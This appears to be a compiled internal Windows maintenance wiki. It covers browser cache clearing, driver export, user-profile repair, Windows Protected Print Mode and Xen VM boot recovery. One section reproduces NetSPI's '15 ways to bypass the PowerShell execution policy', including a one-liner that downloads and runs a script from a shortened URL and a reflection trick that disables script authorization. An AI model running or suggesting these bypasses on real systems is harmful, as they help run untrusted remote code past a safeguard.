Windows Maintenance Windows Maintenance Instructions Browsers Clear Web Browser's Cache Before you begin Clearing your web browser's cache, cookies, and history may remove data such as the following: Saved passwords Address bar predictions Shopping cart contents, etc. While you should clear your web browser's cache, cookies, and history periodically in order to prevent or resolve performance problems, you may wish to record some of your saved information first. If you are unable to do so, see Troubleshooting alternatives below. Notes: For desktop browsers, to quickly open menus used to clear your cache, cookies, and history, ensure that the browser is open and selected, and press  Ctrl-Shift-Delete  (Windows) or  Command-Shift-Delete  (Mac). If this doesn't work, follow the appropriate instructions below. If the instructions below don't exactly match what you see, you may need to update your web browser to the latest version.   If you don't see instructions below for your specific version or browser, search your browser's Help  menu for "clear cache". If you're unsure what browser version you're using, from the  Help  menu or your browser's menu, select  About [browser name] . In Firefox, if you don't see the menu bar, press  Alt .     Desktop browsers Microsoft Edge Important: Microsoft Edge Legacy support ended on March 9, 2021. If you still have Edge Legacy, UITS recommends installing the new Chromium-based Microsoft Edge by running Windows Update. In the top right, select the Hub icon (looks like star with three horizontal lines). Select the History icon (looks like a clock), and then choose  Clear all history . Select  Browsing history , then  Cookies and saved website data , and then  Cached data and files . Select  Clear . After the "All Clear!" message appears, exit/quit all browser windows and re-open the browser. Chrome In the browser bar, enter: chrome://settings/clearBrowserData At the top of the "Clear browsing data" window, select  Advanced . Select the following: Browsing history Download history Cookies and other site data Cached images and files From the "Time range" drop-down menu, you can choose the period of time for which you want to clear cached information;  to clear your  entire cache , select  All time . Select  CLEAR DATA . Exit/quit all browser windows and re-open the browser.   Firefox From the  History  menu, select  Clear Recent History... . If the menu bar is hidden, press  Alt  to make it visible. From the "Time range to clear:" drop-down menu, select the desired range; to clear your entire cache, select  Everything . Next to "Details", select the down arrow to choose which elements of the history to clear; to clear your entire cache, select all items. Select  Clear Now . Exit/quit all browser windows and re-open the browser.   Opera From the  Opera  menu, select  Settings , then  Privacy & Security , and then  Clear browsing data... . In the dialog box that opens, from the "Obliterate the following items from:" drop-down menu, select  The beginning of time . Select the following: Browsing history Download history Cookies and other site data Cached images and files Select  Clear browsing data . Exit/quit all browser windows and re-open the browser.   Safari 8 and later From the  Safari  menu, select  Clear History...  or  Clear History and Website Data... . Choose the desired time range, and then select  Clear History . Select  Safari > Quit Safari  or press  Command-Q  to exit the browser completely.     Mobile browsers Android The steps to clear your cache, cookies, and history may differ depending on the model of your Android device and your preferred browser, but you should be able to clear your cache and data from your application management settings menu: Go to  Settings  and choose  Apps  or  Application Manager . Swipe to the  All  tab. In the list of installed apps, find and select your web browser. Select  Clear Data , and then  Clear Cache . Exit/quit all browser windows and re-open the browser. Chrome for Android Select  Chrome menu , then  Settings , and then  (Advanced) Privacy . From the "Time Range" drop-down menu, choose  All Time . Check  Cookies and Site data  and  Cached Images and Files . Select  Clear data . Exit/quit all browser windows and re-open the browser. Safari for iOS Open your Settings app. Select  Safari . Select  Clear History and Website Data  and confirm. Exit/quit all browser windows and re-open the browser. Chrome for iOS Select  Chrome menu , then  Settings , and then  Privacy . Select  Clear Browsing Data . Choose the data type you want to clear, and then select  Clear Browsing Data . Exit/quit all browser windows and re-open the browser.   Change your display refresh rate in Windows The refresh rate of a display is the number of times per second that the image refreshes on the screen. For example, a 60Hz display will update the screen 60 times per second. Overall, the refresh rate determines how smoothly motion appears on your screen. For example, if you’re playing a game that has a lot of fast-moving action, a higher refresh rate can help improve your overall gaming experience to keep up with the action. A higher refresh can also help you get a better experience with smoother motion when you're browsing the web or using a digital pen to write or draw. A higher refresh rate can also reduce battery life because it uses more power. So if you're using a laptop or tablet and want to save some battery, you could lower the refresh rate. However, that might also reduce the overall experience when you're using your device.   Windows 10       To change the refresh rate in Win 10 Select the  Start   button, then select  Settings   >  System   >  Display   >  Advanced display settings . Under  Refresh rate , select the rate you want. The refresh rates that appear depend on your display and what it supports. Select laptops and external displays will support higher refresh rates.         Windows 11 To change the refresh rate in Win 11 Select  Start >  Settings   >  System   >  Display   >  Advanced display  . Next to  Choose a refresh rate , select the rate you want. The refresh rates that appear depend on your display and what it supports. Select laptops and external displays will support higher refresh rates. Note:  You might see the word “ dynamic ” next to some refresh rates that are listed. Dynamic refresh rates will increase the refresh rate automatically when you’re inking and scrolling, and then lower it when you’re not doing these types of things. This helps to save battery and provide a smoother experience.  Please DISABLE dynamic refresh rate . Dynamic refresh rate will interfere with displaying images on the Smartboards How to change audio playback medium in Windows Windows 10   To change the Default Audio Device, do the following.   Click on the sound volume icon in the system tray.   Click on the up arrow in the sound flyout.   Choose the desired audio device from the list.   Export drivers from Windows   PowerShell – Export drivers from Windows   You can easily export drivers from Windows OS using PowerShell. Using the Export- WindowsDriver  cmdlet, you can export all third-party drivers from a Windows image to a destination folder.   The advantage of exporting the drivers is you can restore them when you require. Once you perform Windows 10 clean install, with this backup you can quickly install all the necessary drivers. In addition, if you deploy OS using MDT, you can always import the drivers and use it to deploy using  Configuration Manager .   The Export- WindowsDriver cmdlet exports all third-party drivers from your computer to a destination folder. You can either export drivers from the running operating system or export drivers from an offline image.   Export- WindowsDriver  Parameters   There are  several parameters  which you can use while running Export- WindowsDriver cmdlet. Some of the parameters include:   -Destination   – Specify a folder or directory where you want to export third-party drivers.   - Loglevel  – Specifies the maximum output level shown in the logs.   - LogPath  – You can log the export process by adding the log file name and path.   -Path  – Specifies the full path to the root directory of the offline Windows image that you will service.   - WindowsDirectory  – Enter the relative path to the Windows directory relative to the image path.   - SystemDrive  – Specifies the path to the location of the  BootMgr  files.   - ScratchDirectory  – Specifies a temporary directory that will be used when extracting files for use during servicing.   PowerShell – How to Export drivers from Windows   To export drivers using PowerShell from Windows 10   On your Windows 10, right click  Start  and click  Windows PowerShell (admin) .   Enter the command  Export- WindowsDriver  -Online -Destination D:\Drivers . The D:\Drivers is the folder where all of your computer’s third-party drivers will be exported.   PowerShell – Export drivers from Windows      Now go to the destination folder and you will see the folders containing the drivers.   So next time when you install Windows 10, you don’t need to go to vendors website and search for drivers. With this backup you can quickly install all the necessary drivers.   And finally let me clarify the use of the below two commands.   Export- WindowsDriver  –Online -Destination D:\Drivers  – Use this command to export the computer’s third-party drivers to destination folder.   Export- WindowsDriver  -Path C:\Windows_Image -Destination D:\Drivers  – Use this command when you want to export drivers from the offline Windows image mounted to destination folder.     How to Delete a User Profile on Windows The first time a user logs in on a Windows computer, a user profile is created and stored on the local hard disk. This profile contains all settings, from wallpaper to email details and network connections. If you’ve created multiple user profiles on your PC over time, this tutorial shows how to delete a user profile on Windows that is no longer needed. 1. Advanced System Properties The easiest way to delete an unnecessary user profile is by accessing the Advanced System Properties on your Windows PC. Press  Win  +  R  on your keyboard to launch the Run dialog, type  systempropertiesadvanced  in the box, and click “OK.” In the “Advanced” tab, click the “Settings” button under “User Profiles.” From the list of user profiles stored on your Windows computer, select the one you don’t need, and click the “Delete” button. Click “Yes” in the confirmation dialog that pops up on your screen. The user profile has now been successfully deleted from your computer. Tip : experiencing  issues with the Settings app on Windows ? Check out the most effective solutions for this problem. 2. Settings App You can also delete a user profile and all of its associated data from your Windows PC by using the Settings app. Click the Start button, and launch the Settings app. Click “Accounts” in the left pane, scroll down and click “Other users” in the right pane. You will see a list of other users accessing your computer. Click the arrow next to the user profile that you want to delete. Click the “Remove” button. Click “Delete account and data,” and you’re done. 3. Registry Editor If you prefer, you can also delete a user profile from Windows through the Registry Editor. Make sure you  create a backup of the registry  before you proceed, in case something goes wrong during the process. Press  Win  +  R  to launch the Run utility, then type  regedit  in the box, and click “OK.” Navigate to the following path on the Registry Editor: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList In the left pane, you’ll find multiple keys under the ProfileList folder. Click each subfolder one by one. In the right pane, find the path to the profile you wish to delete in the “Data” field for the “ProfileImagePath” key. In this example, we’re looking to remove the “vritr” user. Right-click the ProfileImagePath key associated with the user profile you are looking to eliminate and select “Delete.” Click “Yes” in the confirmation dialog to remove the user profile from your Windows computer. 4. PowerShell With PowerShell, you can do all kinds of things, including deleting user profiles, as shown in the steps below: Press  Win  +  X , and click “Terminal(Admin)” to launch PowerShell. Type the below command, and press  Enter  to view the list of user profiles on your computer. Make a note of the user profile you want to remove from your PC. Get-LocalUser To delete a specific user profile, use the below command, followed by  Enter . Replace with the name of the user profile you want to delete from your Windows computer. Remove-LocalUser -Name Since you won’t see a success message for the above command, you can use the same command in step #2 to verify whether the user profile was deleted. 5. File Explorer You can also delete a user profile and its data on a Windows PC via the File Explorer app, but make sure you are logged in as an administrator before you attempt to do so. Press  Win  +  E  to launch File Explorer and click “This PC” in the left pane. Double-click “Windows (C:)” under “Devices and drives.” Click on the “Users” folder. Select the name of the user profile you wish to delete, and press the  Del  key on your keyboard to delete the user profile from your Windows PC. FYI :  are you frequently encountering problems with the File Explorer app ? Check out the most effective solutions. Cleaning Up Your Windows PC While deleting inactive user profiles will not significantly  free up storage on your “C:\” drive , learn additional methods to recover free space. If you’ve encountered the “ User profile service failed the sign-in ” error message, try to delete the user profile and create a new one. How to Fix the “User Profile Service Failed the Sign-in” Error for Windows Are you getting the “User Profile Service failed the sign-in” or “User profile cannot be loaded” error during Windows startup? This message is shown as soon you type your password in the Windows logon screen, and your default user profile fails to launch. In its place, a corrupt user profile takes over, changing your lock screen and desktop background. Because the proper profile wouldn’t load, you’re unable to log in to your system. If you’re facing this frustrating issue, one of our solutions below will resolve it immediately. Causes of “User Profile Service Failed the Sign-in” Error There are many reasons you may encounter the “User profile failed the sign-in” error. Variations of this error include: “User profile cannot be loaded” and “User profile service failed the logon.” If you get any of these error messages, it means the default Windows user profile has been corrupted, which can be traced to one or more of the following factors: Improper Windows update:  User Account Control (UAC) is designed to prevent unauthorized changes to your Windows device. Any irregular or unfinished updates or a crash can sometimes corrupt host files that are required for UAC to work properly. Partition resizing error : when resizing partitions from Disk Management, those parts can occasionally get corrupted, leading to an incorrect user profile. Antivirus program : if an  antivirus program  was scanning your system while you tried to log in, it can abort the correct user profile and launch an incorrect one. Improper shutdown and restarts   in guest logons : if you did not exit smoothly from a local account created on your PC, you may encounter a user profile error on a subsequent login. Tip : looking to  smoothly transfer user profile data to another in Windows ? This guide can help. Solutions for User Profile Service Failed the Logon Error in Windows The good thing is that none of the above causes are major concerns. You can easily repair the corrupted user profile using one of the troubleshooting solutions below. You should first attempt the first few easy methods. Go for the more intricate and time-consuming solutions toward the end – only if the easy ones fail to resolve the problem. 1. Restart or Shut Down Windows From Its Lock Screen Sometimes you only need a simple restart or shutdown from the lock screen window to fix the issue. Whether you’re inside an administrator or guest logon, use  Win  +  L  to exit, and go to the Windows lock screen. Navigate to the administrator profile (if a guest profile was previously used to log in), and click the lock screen shutdown/restart options. Make sure you log in as the administrator during the subsequent startup. We can help if you need to  reset your administrator password . Tip : did you know that you can  install Windows 11 even on an unsupported PC ? Learn how to get started. 2. Delete a Local User Account in Windows If the user profile error is due to improper shutdowns and restarts during a guest logon, you may want to delete the unnecessary local account temporarily. After signing in to your computer on an incorrect user profile, start the Windows Run command option using  Win  +  R , and enter  netplwiz . You will encounter the Advanced User Accounts Control Panel screen. Enter your administrator password to proceed. Sometimes there will be an error if the system refuses to accept your admin password. In that case, use the Windows Safe boot to perform these steps. (Described in the FAQ below.) Click the “Remove” option next to your guest/local account. Even if you’re currently logged in on your computer with the local account, the local profile here will be removed. Use Win  +  L  to exit the local account logon window. Restart the computer, and make sure to  use your regular Microsoft account to log back in . 3. Move NTUSER.Dat File to Default Username Folder A user profile consists of personalized menu items for desktop, downloads, documents, music, videos, and saved links that are stored in a folder inside “C:/Users.” For each of these profiles, a .DAT file called NTUSER.DAT is created by Windows. It contains personalized user settings. Try moving the file associated with the buggy profile to a default username folder. Go to the necessary local account inside “C:/Users,” and press  Ctrl  +  X  to cut the NTUSER.DAT file for that account. Move the .DAT file into the “Default” username folder. You may not be able to see this folder. If so, change the “View -> Show” to “Hidden items” in File Explorer. Delete the local account folder, and restart the PC to see whether the proper user profile is loading. Tip : did you know that you can  perform a Windows Defender scan from Command Prompt ? We demonstrate how in our guide. 4. Windows User Profile Repair Using Command Prompt The evergreen Command Prompt can fix some of the hard disk-related issues that may have caused the user profile error problem. Go to Start, and search for “Command Prompt.” Select “Run as administrator” under the result. Perform a Deployment Image Servicing and Management Tool (DISM) scan, which helps repair the Windows image and may solve the user profile services error. DISM.exe /Online /Cleanup-image /scanhealth Likewise, a System File Checker (SFC) command is the best way to repair corrupt Windows files, including user profile settings. sfc /scannow Tip : the  WDF violation error  can sometimes arise on your Windows PC. Learn what to do about it. 5. Use Windows Registry Editor in Safe Mode The Windows Registry Editor (Regedit) is one of the best solutions to fix the “User profile service failed the sign-in” error. For this, the troubleshooting is achieved in Safe mode. In Windows 11, go to “Advanced startup” from the Search menu. For Windows 10, the corresponding option is “Change advanced startup options.” Click “Restart now” to initiate an advanced restart. Select “Troubleshoot” on the blue screen. Go to “Advanced options -> Startup settings,” and initiate another restart of the device. Following the restart, you will see a number of startup settings that can be accessed using the number keys (1-9) or function keys (F1-F9). Select the option to “Enable safe mode.” Once you sign in, you will enter Windows in Safe Mode. Very minimal options are visible in this mode. Start the Windows Run command option using  Win  +  R , and enter  regedit . This task will be automatically created with administrator privileges. Navigate to the following path in the Registry Editor: Computer\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList Check the last few entries under “ProfileList” to see whether there are any duplicates, e.g., the entries have similar names, but at least one will contain a .BAK file. This extension will appear at the end of one of the items in the “Name” column. For instance, if you open one of the ProfileList folders, you may see .BAK after any of the values listed. If you don’t see anything with this extension, skip to the bottom of the section. If you do have a value with the extension, and it’s present in the last entry, rename the .BAK extension to just .BA. For any duplicate entry, rename it to something else, but keep the .BAK extension. Delete any surplus .BAK extensions, if present, for duplicate entries. Delete the .BA extension in the entry that was just renamed. Right-click and modify the State key of the profile entry from where the .BAK was removed. Basically, we are switching the active default user profile through a minor registry tweak. Change the hexadecimal DWORD value from a numerical value to “0.” Click “OK” to save the settings. Restart the PC in normal mode. The “User profile service failed the logon” error should be gone once you log in again. No .BAK File? If you don’t have a .BAK file, see the workaround below. Open File Explorer, and navigate to “C:\Users\Default\AppData\Local\Application Data” If you see another folder inside this one named “Application Data,” delete it, and restart your computer. If you don’t have an Application Data folder at all, this fix will not apply. FYI : wondering  when you should use Command Prompt over Powershell and vice versa ? We highlight the differences. 6. Restart the User Profile Service Occasionally, third-party software and apps stop the User Profile service from running, resulting in this error. Restart it using Command Prompt: Open Command Prompt, and run it as an administrator as shown above. Enter the following command, and press  Enter : sc config ProfSvc start= auto At the next prompt, enter the following command, and press  Enter : sc start ProfSvc Restart your computer to fix the error. If these commands won’t run, try restarting your PC in Safe Mode, then performing the above. If another app or program has changed the status of this service, it may continue to stop. To ensure it starts automatically with Windows, open a Run dialog window, and type  services.msc . Scroll until you see “User Profile Service.” If it doesn’t say “Automatic” under the “Startup Type” column, right-click “User Profile Service,” and select “Properties.” Change “Startup Type” to “Automatic,” and click “Apply” to save the changes. You may need to restart your PC to log in correctly. 7. Reset Windows PC If all the above options fail, use the “Reset” option to go back to a clean factory reset of your Windows operating system. You have to be connected online to achieve this cloud-based reset. The  Windows 11 reset method  has been covered in detail, but the essential steps, which are common with Windows 10, too, are summarized below: Go to “System -> Recovery -> Reset this PC,” and click “Reset PC.” Choose “Keep the files” or “Remove everything.” Choose the former option so that you don’t need to save a backup. It’s still a good idea to back up your files, just in case anything goes wrong. Select the “Cloud download” option to reinstall your version of Windows. The download will take some time to finish. Once you see the “Ready to reset the PC” screen, click “Next” to proceed. Sit back and wait for the reset to finish, as the download will take some time. The entire procedure can consume anything from a few hours to an entire day, so we recommend the reset method only if the other methods don’t solve the problem. Tip : should you opt for a  cloud download or local reinstall  when performing a Windows reset? We explain the differences in our post. Frequently Asked Questions How do I fix the "User profile failed" error during sign-in for Windows 8/8.1 and Windows 7? If you’re using an older Windows version, such as 8.1/8/7, only a few of the above-described solutions will be able to address the user profile error. You can try a restart, use a DISM and SFC scans in Command Prompt, and move the NTUSER.DAT file to a default folder. The options to delete a local user account and enable a cloud-based reset will not work. How do I solve the “We can’t sign in to your account” error while restarting the User profile service? Sometimes, while restarting the user profile service in guest/local account mode (Section 6), you’re unable to sign in to your Administrator account. To solve the problem, boot into your Windows device in Safe Mode, and perform the same steps outlined in section 2. Then, repeat the steps from Section 6 to restart the User Profile Service. Can other software or Windows updates interfere with the User Profile Service? Sometimes it can. If you start getting this error the next time you sign in after installing something new, try uninstalling the new software to see whether that fixes the problem. If your PC recently installed updates, try uninstalling them and updating again. Go to “Start,” and search for “Windows updates.” Select “Update history” and “Uninstall updates” under the list of recently installed updates. Select what you want to uninstall, and restart your PC. Image credit:  Freepik . All screenshots by Crystal Crowder and Sayak Boral . Is this post useful? Subscribe to our newsletter! Our latest tutorials delivered straight to your inbox Windows Protected Print Mode (WPP) Should I switch on WPP now? Not yet! PaperCut is actively working on a solution to support printing with Windows Protected Print Mode. Sign up for early access through our  Percolator program . What is Windows protected print mode? Windows protected print mode (WPP) is a security-enhanced printing platform for Windows that runs with lower privileges and uses Internet Printing Protocol (IPP) to eliminate the need for third-party drivers. Together, these remove significant security risks that can lead to attackers gaining SYSTEM-level access. Whether you’re an IT manager, security professional, or business owner, understanding the impact and benefits of WPP is essential as it changes the landscape of print infrastructure. This page provides a comprehensive overview of WPP, its timeline, and how your organization can prepare for and benefit from this powerful security feature. Why Microsoft is introducing Windows Protected Print Mode According to Microsoft  , 9% of Windows security issues reported to the Microsoft Security Response Center (MSRC) were caused by print stack-related issues. The fact that the spooler runs with system privileges and has to load code over the network makes the entire operating system vulnerable to malware. Print Nightmare  allowed hackers to exploit this vulnerability to install programs remotely, view and delete data or even create new user accounts with full user rights. Another spooler-related weakness was exploited by the Stuxnet virus, which was used as a digital weapon to  gain remote access to the computers  that controlled centrifuges at an Iranian uranium enrichment plant. This allowed the attackers to configure the fast-spinning centrifuges to tear themselves apart. Print Nightmare patches are a temporary workaround that now requires admin rights to install printers. The admin rights requirement only protects a shared computer, where one user might have installed a printer driver with malware that would compromise others on the computer too. This change doesn’t fix the spooler privilege issue that is exploitable by a driver with malware, and it introduces user experience issues by forcing admin privileges just to install printers. The proper solution is Windows Protected Print Mode, as it removes the fundamental flaw of drivers and moves the world of printers forward to finally settle on the IPP standard. At PaperCut, we support Microsoft’s decision, even though it will cause some adoption friction. As an aside, Windows isn’t the only operating system plagued by a vulnerable print platform. CUPS, used in Linux, macOS, and ChromeOS, also has a long history of security issues. In September 2024, new reports showed how it is  possible to remotely execute code on a Linux computer  without requiring authentication. Some Linux distributions, like Ubuntu, are planning to limit access to the rest of the operating system by moving CUPS into a containerised Snap App. How Windows Protected Print Mode works WPP uses modern standards and secure communication methods to ensure a robust and consistent printing experience. Here are some of the key details. Printer and job delivery is based on Internet Printing Protocol (IPP) WPP uses IPP as the core transport protocol - a well-established, open standard that provides a framework for printer discovery, job submission, and status tracking. IPP allows WPP to support advanced features such as finishing options, job status updates, and access control, enabling a richer printing experience. The port monitor used when adding a WPP print queue is Microsoft’s new IPP port, which provides a richer set of IPP functions. No more third-party printer drivers and modules WPP forces a driverless printing model. When it’s enabled, client computers can no longer load third-party printer drivers, eliminating the risk of attackers loading malicious code. In addition to the printer drivers, the loading of other, less well-known modules, such as third-party  print providers  , is blocked. WPP prevents Point and Print from ever installing third-party printer drivers. This eliminates the risk of an attacker pretending to be a printer and tricking users into installing malicious software. Common print spooler tasks are now run at lower privilege level Since the drivers are no longer required to run as SYSTEM, most common spooler tasks can now run as USER. This reduces the risk of a rogue or a buggy program taking down the whole machine. The impact will be limited to actions only the user can perform. The challenges of transitioning to Windows Protected Print Mode When you switch on Windows Protected Print Mode, the existing print queues and drivers on the computer will be permanently deleted. You won’t get them back if you decide to switch WPP off. It is an all-or-nothing setting. You can’t use a driver for some printers while using Windows Protected Print Mode for others. If WPP is enabled, print drivers are nonexistent. Not all printers are equal. Based on a sample of thousands of printer models we assessed, roughly 70% of printers will work seamlessly over IPP. For the rest, they will either function with reduced speed, lower quality or not at all. Existing scripts that system admins may have in use, such as  printui  scripts to manage printers, won’t work anymore. How enabling WPP will affect organizations and their print infrastructure To understand how enabling Windows Protected Print Mode might affect organizations, let’s use a hypothetical scenario: Info The university IT administrator's dilemma Alex, the lead IT administrator at a mid-sized university, heard about WPP during a recent security conference. The idea of having a more secure, driverless printing environment using the Internet Printing Protocol (IPP) sounded like a great way to tighten the university’s security. With hundreds of devices across different departments, ensuring that no vulnerabilities could be exploited through outdated drivers or unmonitored print processes seemed like a major win. Eager to implement WPP, Alex decided to enable it across the university’s network, confident that this would reduce risks and future-proof the printing setup. The change went live during a routine maintenance window, with IT teams monitoring performance and response. However, as the next day began, emails started flooding in from staff and students across campus. The university's fleet, consisting of older and newer printers, faced a serious issue:  30% of the printers weren’t working!  Despite being reliable for everyday use, they weren't Mopria compliant and/or IPP-compatible. The Issues staff and students were experiencing Printer Recognition Problems: Some of the older printers weren’t showing up in Windows’ printer lists anymore and attempts to manually add printers were failing with error messages “can’t add” Loss of Features: Other printers were partially working, but features like stapling, colour management, and even advanced security protocols like pull printing were no longer functional. This disrupted the workflows of departments that relied heavily on advanced printing tasks. User Frustration: Professors were missing critical deadlines to print exams, and research departments couldn’t print their reports. The more Alex’s team tried to patch things up, the more they realised the issue was systemic: these printers did not support IPP and were reliant on specific drivers that WPP no longer allowed. Lessons learned In retrospect, Alex realized that turning on WPP without fully assessing the fleet was premature.  While the security benefits were undeniable, it required careful planning and implementation. Will my printer work with Windows Protected Print Mode? Mopria has an  online list of certified printers  you can use to check your printer models. Although a printer could be listed as Mopria-certified, it doesn’t necessarily mean it will work with WPP or that you will get the most out of your printer once you switch over to using IPP in WPP mode. At the time of writing, Windows Protected Print Mode deems some IPP attributes mandatory, even though they are technically specified as optional according to Mopria standards, such as the hardware ID. Additionally, WPP requires some IPP values to be in a specific format that some printers do not follow. Some printers that support IPP don’t necessarily support PDF-based spool files; instead, they only support formats like URF/raster or JPEG. This still follows the specification, but these spool files will be much larger and often print in lower quality. In addition to being larger, these formats require the entire print job to be submitted to the printer before the printer can start printing them, which results in slower printing or even failure to print larger documents as the printer can’t store the entire print job. For now, the best way to confirm that your printer is ready for WPP is to enable WPP on a test Windows machine and print from it. If your printer can’t be found when WPP is enabled, you know it’s incompatible. Check different finishing options, especially more advanced options like stapling and tray selection if the printer supports it. Options for printers that are non-compliant with Windows Protected Print Mode We are making changes in PaperCut MF/NG and PaperCut Hive/Pocket to support printers that are WPP ready and also printers that are not WPP ready. You can  sign up for PaperCut MF/NG Early Access  now. PaperCut Hive/Pocket Early Access registrations will open in November. Alternatively, if your printers are not ready, your printer manufacturer may soon provide a firmware update if your printers are not too old, so keep an eye out. How to switch on Windows Protected Print Mode Enable WPP mode via Settings 1. Navigate to Settings > Bluetooth & devices > Printers & scanners > Printer preferences Click ‘Set Up’. Windows will display a warning message. Additionally, if WPP-incompatible print queues (such as standard TCP/IP queues) were already installed, Windows would warn that they would be removed. After successful completion, WPP should be turned on. Enable WPP mode via Group Policy Via Group Policy Editor > Administrative Templates > Printers > Configure Windows protected print > Edit Timeline and updates Note that these dates are subject to change: 01 OCTOBER 2024 When you enable Windows Protected Print Mode for the first time after the 24H2 upgrade, the existing incompatible (such as TCP/IP) queues may not get deleted. Also, you may still be able to create TCP/IP print queues. A system reboot may fix the issues. This is a known issue, and Microsoft is working on fixing it. 04 OCTOBER 2024 Microsoft is pushing the patch  KB5043178  to fix Windows protected print anomalies soon. The estimated rollout date is 8th October. NOVEMBER 2024 First PaperCut MF/NG Windows Protected Print Mode release planned. JANUARY 2025 First PaperCut Hive/Pocket Windows Protected Print Mode release planned. 2027 Windows Protected Print Mode is enabled by default. Further reading The official  Microsoft Windows Protected Print Mode announcement More from Microsoft about WPP Microsoft’s  Windows protected print mode FAQ How to Login to a Company Computer for the First Time - Active Directory Follow these steps to log in to your computer for the first time after joining the company: Step 1: Get Your Login Details Username : Provided by IT (e.g., jdoe ). This is what you use to log in to your computer. Temporary Password : A one-time password provided by IT for your first login. Email Address : Separate from your username, used for communication (e.g., yourname@companydomain.com ). Step 2: Turn On the Computer Power on your computer and wait for the login screen to appear. Make sure the device is connected to the company network: At the office : The computer will usually connect automatically. Working remotely : Connect to Wi-Fi or an Ethernet cable. Step 3: Log In Click Other User: Enter your Username : Use the username provided (e.g., jdoe ). Do not include “@companydomain.com”. Enter your Password : Use the temporary password provided by IT. Change Your Password : You will be prompted to create a new password. Choose one that meets company security standards: Use a mix of uppercase, lowercase, numbers, and symbols. Example: SecurePass2024! . Step 4: Confirm Access After logging in: Ensure you can access your desktop. Open tools like email, shared folders, or other company applications to confirm everything works. Step 5: Get Help if Needed If you experience issues: Double-check your username and password. Ensure your computer is connected to the network. Contact IT for assistance. 15 Ways to Bypass the PowerShell Execution Policy Author: Scott Sutherland Source: NetSPI 🔎 What is the PowerShell Execution Policy? The execution policy determines what type of PowerShell scripts (if any) can run. By default, it's set to Restricted , which blocks all scripts. It's meant to prevent accidental execution, not as a true security control — which is why it’s easy to bypass. 💡 Why Bypass It? PowerShell is native to Windows Maintenance of a Server Requiring .PS1 scripts created by another organization. Can interact with the Windows API Can run in memory (no disk writes) Often trusted by whitelisting tools Used in many open-source pentest frameworks 🔍 View Current Execution Policy Get-ExecutionPolicy Get-ExecutionPolicy -List | Format-Table -AutoSize 🧪 Test Script Example Write-Host "My voice is my passport, verify me." --- 🚪 15 Ways to Bypass Execution Policy Paste in Interactive Console Directly run the script in PowerShell. No config changes or file writes. Echo to PowerShell echo Write-Host "My voice is my passport" | powershell -noprofile - Pipe File via Type/Get-Content Get-Content .\runme.ps1 | powershell -noprofile - type .\runme.ps1 | powershell -noprofile - Download + Invoke-Expression powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH')" Use -Command Switch powershell -command "Write-Host 'Hello'" Use -EncodedCommand $cmd = "Write-Host 'Hello'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd) [Convert]::ToBase64String($bytes) Then run with: powershell -EncodedCommand Invoke-Command Invoke-Command -ScriptBlock {Write-Host "Hello"} Can also pull policy from a remote host: Invoke-Command -ComputerName server -ScriptBlock {Get-ExecutionPolicy} | Set-ExecutionPolicy -Force Invoke-Expression (iex) Get-Content .\runme.ps1 | Invoke-Expression or gc .\runme.ps1 | iex Use -ExecutionPolicy Bypass powershell -ExecutionPolicy Bypass -File .\runme.ps1 Use -ExecutionPolicy Unrestricted powershell -ExecutionPolicy UnRestricted -File .\runme.ps1 Use -ExecutionPolicy RemoteSigned powershell -ExecutionPolicy RemoteSigned -File .\runme.ps1 Swap AuthorizationManager (Temporary) function Disable-ExecutionPolicy { ($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue( $ctx, (New-Object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell")) } Disable-ExecutionPolicy Set Policy for Process Set-ExecutionPolicy Bypass -Scope Process Only for this session. Set Policy for Current User Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy UnRestricted Edit Registry for Current User Modify: HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell Add/modify string value ExecutionPolicy = Unrestricted --- ✅ Wrap Up PowerShell’s execution policy is a soft restriction — not a security boundary. Microsoft even provides native ways to bypass it. Use these techniques for legitimate automation, testing, and administration. Adapted from NetSPI — original blog post Troubleshooting Windows Server VM Reboot Loop & INACCESSIBLE_BOOT_DEVICE on XCP-ng Document Purpose: This guide documents the process for diagnosing and recovering a Windows Server 2019/2022 VM running on XCP-ng / Xen Orchestra that becomes stuck in a reboot loop or shows the blue screen: STOP CODE: INACCESSIBLE_BOOT_DEVICE 1. Symptoms 1.1 Silent Reboot Loop VM resets immediately after attempting to boot. No Windows logo appears, or it appears only briefly. No BSOD is displayed; the VM simply restarts. 1.2 Visible BSOD The VM may show a blue screen with: INACCESSIBLE_BOOT_DEVICE 1.3 WinPE is Accessible Server can boot from the Windows ISO. Command Prompt from recovery environment works. OS drive and files are visible and readable. Filesystem checks (chkdsk, sfc) may already pass. 2. Likely Root Causes Area Description Corrupted Xen PV Drivers Network/interface drivers crash early in boot, causing instant resets. Crash-Suppressing Drivers xencrsh.sys and related drivers can reboot the VM before a BSOD is displayed. Bootloader / EFI Misalignment EFI partition or BCD is pointing to the wrong Windows installation or wrong disk. VM Boot Mode Conflict VM is running in PVHVM while OS expects HVM (or vice-versa), causing storage initialization failure. Driver Mismatch After Updates Windows Update or guest tools update changes the boot driver stack; Xen PV drivers no longer match. 3. Boot into Windows Recovery (WinPE) Attach the Windows Server ISO to the VM. Boot the VM from the ISO. Select Repair your computer > Troubleshoot > Command Prompt . 4. Identify the Windows Volume In Command Prompt (WinPE): diskpart list vol Locate the main NTFS partition (often around 199 GB). This is usually the OS drive. If it has no letter, assign one: select vol assign letter=C exit (Replace with the correct volume number.) 5. Navigate to the Drivers Folder From Command Prompt: C: cd \Windows\System32\drivers If C: does not work, try D: or E: until cd \Windows\System32\drivers succeeds. 6. List All Xen Drivers dir xen*.* Typical output will include some of the following: xenvbd.sys xenbus.sys xendisk.sys xeniface.sys.disabled xennet.sys.disabled xenvif.sys.disabled xenfilt.sys.disabled xencons.sys.disabled xencrsh.sys xen.sys Exact names may vary slightly depending on guest tools version. 7. Ensure Boot-Critical Xen Drivers Are Enabled These three drivers are required for disk access during boot: xenvbd.sys – virtual block device (disk I/O) xenbus.sys – Xen device bus driver xendisk.sys – disk boot interface If any of them are present with a .disabled suffix, re-enable them: ren xenvbd.sys.disabled xenvbd.sys ren xenbus.sys.disabled xenbus.sys ren xendisk.sys.disabled xendisk.sys 